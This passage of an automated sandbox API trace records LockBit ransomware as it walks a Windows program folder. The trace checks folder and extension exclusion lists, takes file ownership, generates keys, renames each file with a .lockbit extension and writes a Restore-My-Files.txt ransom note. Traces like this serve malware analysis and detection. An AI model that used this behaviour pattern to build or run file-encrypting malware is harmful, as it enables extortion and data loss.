(lpString1="Sports", lpString2="tor browser") returned -1 [0088.193] lstrcmpiW (lpString1="Sports", lpString2="boot") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="system volume information") returned -1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="perflogs") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="google") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="application data") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="windows") returned -1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="windows.old") returned -1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="appdata") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Windows nt") returned -1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Msbuild") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Microsoft") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="All users") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="mozilla") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Microsoft.NET") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="microsoft shared") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Internet Explorer") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="common files") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="opera") returned 1 [0088.194] lstrcmpiW (lpString1="Sports", lpString2="Windows Journal") returned -1 [0088.194] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 51 [0088.194] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*") returned 53 [0088.194] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0088.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.198] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.198] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0088.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.198] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ead378, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ead378, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CircleSubpicture.png", cAlternateFileName="")) returned 1 [0088.198] lstrcmpiW (lpString1=".", lpString2="CircleSubpicture.png") returned -1 [0088.198] lstrcmpiW (lpString1="..", lpString2="CircleSubpicture.png") returned -1 [0088.198] PathFindExtensionW (pszPath="CircleSubpicture.png") returned=".png" [0088.198] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.199] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.199] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.199] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.199] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.199] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.199] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.200] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.200] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CircleSubpicture.png") returned 1 [0088.200] lstrcmpiW (lpString1="ntldr", lpString2="CircleSubpicture.png") returned 1 [0088.200] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CircleSubpicture.png") returned 1 [0088.200] lstrcmpiW (lpString1="bootsect.bak", lpString2="CircleSubpicture.png") returned -1 [0088.200] lstrcmpiW (lpString1="autorun.inf", lpString2="CircleSubpicture.png") returned -1 [0088.200] lstrcmpiW (lpString1="thumbs.db", lpString2="CircleSubpicture.png") returned 1 [0088.200] lstrcmpiW (lpString1="iconcache.db", lpString2="CircleSubpicture.png") returned 1 [0088.200] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.200] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png") returned=".png" [0088.200] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.201] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.201] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.202] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.202] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png.lockbit") returned 80 [0088.202] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.202] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.202] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.202] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.203] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.203] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.203] RtlFreeAnsiString (AnsiString="\\") [0088.203] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0088.203] malloc (_Size=0x200) returned 0x77d800 [0088.203] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.203] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.203] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.203] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.204] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.204] CloseHandle (hObject=0x3c4) returned 1 [0088.204] free (_Block=0x77d800) [0088.204] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0088.204] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.204] malloc (_Size=0x40068) returned 0x3d70048 [0088.204] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2910) returned 1 [0088.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.206] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.208] malloc (_Size=0xb6) returned 0x1ff1e60 [0088.209] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0088.209] free (_Block=0x1ff1e60) [0088.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.209] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.209] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0088.209] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.209] malloc (_Size=0x40068) returned 0x1ff1e60 [0088.210] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0088.212] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ed34d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ed34d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x120d, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoldRing.png", cAlternateFileName="")) returned 1 [0088.212] lstrcmpiW (lpString1=".", lpString2="GoldRing.png") returned -1 [0088.212] lstrcmpiW (lpString1="..", lpString2="GoldRing.png") returned -1 [0088.212] PathFindExtensionW (pszPath="GoldRing.png") returned=".png" [0088.212] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.212] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.212] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.213] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.213] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.214] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.214] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="GoldRing.png") returned 1 [0088.214] lstrcmpiW (lpString1="ntldr", lpString2="GoldRing.png") returned 1 [0088.214] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="GoldRing.png") returned 1 [0088.214] lstrcmpiW (lpString1="bootsect.bak", lpString2="GoldRing.png") returned -1 [0088.214] lstrcmpiW (lpString1="autorun.inf", lpString2="GoldRing.png") returned -1 [0088.214] lstrcmpiW (lpString1="thumbs.db", lpString2="GoldRing.png") returned 1 [0088.214] lstrcmpiW (lpString1="iconcache.db", lpString2="GoldRing.png") returned 1 [0088.214] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.214] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png") returned=".png" [0088.214] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.214] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.214] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.214] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.215] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.215] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.215] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png.lockbit") returned 72 [0088.215] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.222] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.222] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.222] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.222] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.223] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.223] RtlFreeAnsiString (AnsiString="\\") [0088.223] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0088.223] malloc (_Size=0x200) returned 0x77d800 [0088.223] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.223] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.223] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.223] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.223] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.224] CloseHandle (hObject=0x3b8) returned 1 [0088.224] free (_Block=0x77d800) [0088.224] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0088.224] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.224] malloc (_Size=0x40068) returned 0x1ff1e60 [0088.224] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4621) returned 1 [0088.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0088.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0088.225] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png.lockbit", NtFileNamePart=0x0, 